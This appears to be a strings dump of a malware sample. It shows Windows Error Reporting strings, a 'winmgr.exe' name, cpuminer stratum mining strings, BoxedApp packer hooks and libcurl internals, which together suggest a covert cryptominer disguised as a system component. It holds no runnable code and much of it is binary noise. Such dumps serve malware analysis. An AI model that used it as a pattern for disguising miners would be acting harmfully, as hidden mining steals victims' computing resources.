WriteFullMemory.Desc.Write(0x%x) failed, 0xx
WriteFullMemory.QueryVirtual(0x%I64x) for info failed, 0xx
Kernel minidump write failed, 0xx
MarshalExceptionPointers.CxRecord.Read(0x%I64x, 0x%x) failed, 0xx
MarshalExceptionPointers.ExRecord.Read(0x%I64x, 0x%x) failed, 0xx
Invalid exception record parameter count (0x%x)
Invalid exception record size (0x%x)
Invalid CPU type (0x%x)
Invalid function table size (0x%x)
GetSystemType.GetOsInfo failed, 0xx
GetSystemType.GetCpuType failed, 0xx
Write.Start failed, 0xx
Dump type requires streaming but output provider does not support streaming
Invalid dump type 0x%x
dbghelp.dll
Alloc(0x%x) failed
Thread(0x%x) will not be included
GenGetImageSections.Section.Read(0x%I64x, 0x%x) failed, 0xx
GenGetImageSections.GenImageNtHeader(0x%I64x) failed
GenGetImageSections.Read(0x%I64x, 0x%x) failed, 0xx
0GenAllocateThreadObject.GetTebInfo(0x%x) failed, 0xx
GenAllocateThreadObject.GetContext(0x%x) failed, 0xx
GenAllocateThreadObject.Open(0x%x) failed, 0xx
GenReadTlsDirectory.Index(0x%I64x, %ws) failed, 0xx
GenReadTlsDirectory(0x%I64x, %ws) unknown machine 0x%x
GenReadTlsDirectory.Read(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenDebugRecord(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GenImageNtHeader(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetImageHeaderInfo(0x%I64x, %ws) failed, 0xx
GenAllocateModuleObject.GetVersion(0x%I64x, %ws) failed, 0xx
GenAllocateProcessObject.GetPeb(0x%x) failed, 0xx
GenIncludeUnwindInfoMemory.Enum(0x%I64x, 0x%x) failed, 0xx
GenGenTebMemory.TLS(0x%I64x) failed, 0xx
GenScanAddressSpace.QueryVirtual(0x%I64x) failed, 0xx
0GenGetAuxMemory(%ws) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumUnloadedModules(0x%x) looped
GenGetProcessInfo.EnumFunctionTableEntries(0x%I64x, 0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) failed, 0xx
GenGetProcessInfo.EnumFunctionTables(0x%x) looped
GenGetProcessInfo.EnumModules(0x%x) failed, 0xx
GenGetProcessInfo.EnumModules(0x%x) looped
GenGetProcessInfo.EnumThreads(0x%x) failed, 0xx
GenGetProcessInfo.EnumThreads(0x%x) looped
GenGetProcessInfo.Start(0x%x) failed, 0xx
GenWriteHandleData.Desc.Write(0x%x) failed, 0xx
GenWriteHandleData.Header.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectName.Write(0x%x) failed, 0xx
GenWriteHandleData.ObjectNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeName.Write(0x%x) failed, 0xx
GenWriteHandleData.TypeNameLen.Write(0x%x) failed, 0xx
GenWriteHandleData.Start(0x%x) failed, 0xx
GenWriteHandleData.Seek(0x%x) failed, 0xx
Software\Microsoft\Windows NT\CurrentVersion\MiniDumpAuxiliaryDlls
Software\Microsoft\Windows NT\CurrentVersion\KnownManagedDebuggingDlls
version.dll
ntdll.dll
%$%,%4%<%
S%T%U%V%W%X%Y%Z%[%\%]%^%_%`%a%
b%c%d%e%f%g%h%i%j%k%l%
!"#$%&'()* ,-./0123456789:;<=
!!!!2222
%%%f||||
!!!!2222||||
!"#$%&'(
'()* ,-./0
&'()* ,-./
&'()* ,-./012345
3456789
.ASex
!"#$%&'()* ,-./012
!"#$%&'()
?msodatad.dat
msodatalast.dat
Unicows.dll
Kernel32.dll
SHLWAPI.DLL
GDI32.DLL
wintrust.dll
1108160
0u.hN
0SSh 
t.WWWj
PSSh07
t5SSh(
PSSSSSSh
0SSSSh
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
OLEACC.dll
OLEAUT32.dll
MSVCRT.dll
RPCRT4.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
USER32.dll
VERSION.dll
WININET.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ReportEventA
ReportEventW
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyW
GetProcessHeap
GetSystemWindowsDirectoryW
_amsg_exit
_acmdln
ShellExecuteExA
UrlGetPartA
CreateURLMoniker
CreateDialogIndirectParamA
EnumWindows
HttpQueryInfoA
HttpSendRequestExA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpEndRequestA
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
wwordlt.exe
excel.exe
excellt.exe
mspub.exe
frontpg.exe
outlook.exe
powerpnt.exe
powpntlt.exe
onenote.exe
infopath.exe
winproj.exe
ois.exe
visio.exe
`!`'`)` `
e%f-f|3 f'f/f
]!^"^#^ ^$^
t.uGuHu
x4x7x%x-x x
h&h(h.hMh:h%h h,k/k-k1k4kmk
k%lzmcmdmvm
^Q]Q~NzP}P\PGPCPLPZPIPePvPNPUPuPtPwPOP
]8^6^3^7^
ichczc]eVeQeYeWe_UOeXeUeTe
{1{ {-{/{2{8{
r6s%s4s)s:t*t3t"t%t5t6t4t/t
t&t(t%u&ukuju
WHX%X
`IaJa aEa6a2a.aFa/aOa)a@a bh
d@d%d'd
duewexei
kCpDpJpHpIpEpFp
S$S%S&S'S(S)S S,S.S2S3S5S6S8S:S;SBSFSKSNSOSPSUSVSXSYS[S]S_SbSdSeSgShSiSjSkSmStSvSzS}S~S
U U!U"U#U$U%U(U)U U:U=U?UBUGUIULUSUTUXUYUZU[U]U`UgUhUiUkUlUmUnUoUpUqUrUsUtUxUyUzU
c c!c"c#c$c%c&c'c.c0c1c5c7c?cRcSc[c\c]c^c_c`cacbcccdcfcjclcsctcyc~c
m!m#m$m&mCmDmEmFmGmHmImJmKmLmMmNmOmPmQmRmSmTmUmVmWm[m\m]mkmqmrmsm
nRsSsh
evg%f
m.tRa
gtr%x
Q%SKg
f.ebp>QI
y.yxT
fn:q%uN
aw.Toiz
RMeXe
S#S$S%S;ScSdSrSsStSuS
`!`"`&`'`)`*` `,`-`.`/`0`2`3`4`5`6`:`=`>`?`
^ ^!^"^#^$^%^&^'^.^}^
c c!c"c#c$c%c&c'c*c7c:c;cSc[c1e?e@eAeBeCeDeEe
f f!f"f#f$f%f&f'f(f)f*f f,f-f
m m!m"m#m$m%m&m'm(m)m*m m,m-m.m1m2m3m4m5m6m7m8m9m:m;m<m=m>m?m@mBmCmDmGmHmImJmKmLmMmNmOmPmQmRmSmTmUm
u u-u.uFuGuHuIuJuKuLuMuNuOuPuQuRuSu
U U!U"U#U$U%U&U'U(U4UJU
](^)^*^ ^,^-^/^0^1^
m/mAmFmVmWmXmYmZm[m\m]m^m_m`mambmcmdmemfmgmhmimjmkmlmmmnmompmqmrmsmtmumvmwmxmymzm{m|m}m~m
x x!x"x#x$x%x'x(x)x*x x,x.x/x0x1x2x3x4x5x6x7x8x9x:x;x<x=x>x?x@xAxXy_yaycydyeygyiyjykylynyoy
} }!}"}#}$}%}&}'}
] ]!]"]#]$]%]&]'](])]*] ],]-].]/]0]
]2^3^4^5^6^7^8^9^:^;^<^>^
cMeNeOePeQeReSeTeUeWeXeYeZe[e]ebe
X X!X"X#X$X%X&X'X(X)X*X X,X-X.X/X0X1X3X4X6X7X8X9X:X;X<X>X?X@XAXBXCXDXEXFXGXHXJXTX_X`XfXmX
d%d-d0d=dRdad2e\e^e_e`eaecedeeefegeheiejele
s"s#s$s%s&s(s)s,s-s/s0s1s2s3s4s5s6s8s9s>s@sGs
u$u%u&u/ujukulumunuouqurusutu
duewexeyeze{e
~ ~!~"~#~$~%~&~'~(~*~ ~-~8~:~0
| |!|"|#|$|%|&|(|)|*|-|.|/|0|1|2|6|
{3~3}3|3
eZl%u
Q.YeY
R:\Sg|p5rL
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexei
s4s/s)s%s>sNsOs
s&t*t)t.tbt
2%2.bx
{ | }9},
d6exe9j
]%sOu4](n
m.t.zB}
w%xIyWy
^vcÓv
%f?iCt
U>_.lE
f.ebp
.nrR=
{fn:q%uN
winmgr.exe
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
<description>Windows Error Reporting</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
General_Reportee=
CheckBoxRegKey=
ReportingFlags=
Stage1URL=
Stage2URL=
%General_Reportee%
%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
policy.txt
crash.log
status.txt
hits.log
count.txt
%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
dwtrig20.exe
ReportSize=
\*.cab
dwq.snt
"%s" -%c %u
SEventSystem.EventSubscription
SubscriptionID=%s
#$%&%&'(
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\28CBE8.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
11.0.8160
Windows
DW20.Exe

cvtres.exe_2276:

.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
hXXp://
hXXps://
stratum tcp://
hXXp://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
hXXp://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: hXXp://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
<p.uH
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
It's impossible to create virtual file: parent node is virtual, but passed pBehavior is not NULL
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
: RegTree::IKeyNode::Remove() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::AddKey() failed, hr =
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: RegImpl::CreateKeyOnSharedMem() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKey
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
RegOpenKeyExW
RegOpenKeyW
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
P`.data
.edata
[email protected]
SShPi
SSh}i
purl/
j.RPj
libgcj_s.dll
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Last-Modified: %s, d %s M d:d:d GMT
%c%c==
%c%c%c=
%c%c%c%c
%s:%d
%5[^:]:%d:%5s
Resolve %s found illegal!
Added %s:%d:%s to DNS cache
timeout on name lookup is not supported
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed, boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
p.jpg
p.jpeg
p.txt
p.html
p.xml
#HttpOnly_
23[^;
=]=I99[^;
httponly
skipped cookie with illegal dotcount domain: %s
skipped cookie with bad tailmatch domain: %s
%s cookie %s="%s" for domain %s, path %s, expire %lld
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
# Fatal libcurl error
WARNING: failed to save cookies in %s
Avoided giant realloc for header (max is %d)!
HTTP/
The requested URL returned error: %d
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
%sAuthorization: Basic %s
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, TE
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
;type=%c
Range: bytes=%s
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s/%lld
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP error before end of send, stop sending
HTTP/%d.%d =
HTTP =
RTSP/%d.%d =
The requested URL returned error: %s
HTTP 1.0, assume close after body
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
[%s %s %s]
Recv failure: %s
Send failure: %s
/etc/ssl/certs/ca-certificates.crt
IDN support not present, can't parse Unicode domains
Connected to %s (%s) port %ld (#%ld)
%5[^:@]:%5[^@]
[%*45[0123456789abcdefABCDEF:.]%c
%s://%s%s%s:%hu%s%s%s
Port number too large: %lu
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
Curl_addHandleToPipeline: length: %d
Closing connection %d
Connection #%ld to host %s left intact
Found bundle for host %s: %p
Server doesn't support pipelining
Connection %d seems to be dead!
[^:]:%[^
:]://%[^
<url> malformed
:%5[^@]
Protocol %s not supported or disabled in libcurl
%s://%s
Couldn't find host %s in the _netrc file; using defaults
[email protected]
Found connection %d, with requests in the pipe (%d)
Re-using existing connection! (#%ld) with host %s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
zlib/%s
7.30.0
%%X
login
password
[^?&/:]://%c
Issue another request to this URL: '%s'
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
No URL set!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
operation aborted by callback
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
HTTP server doesn't seem to support byte ranges. Cannot resume.
Problem (%d) in the Chunked-Encoded data
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
pUnrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
psa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Could not set TCP_NODELAY: %s
TCP_NODELAY set
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
Failed to connect to %s: %s
couldn't connect to %s at %s:%d
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
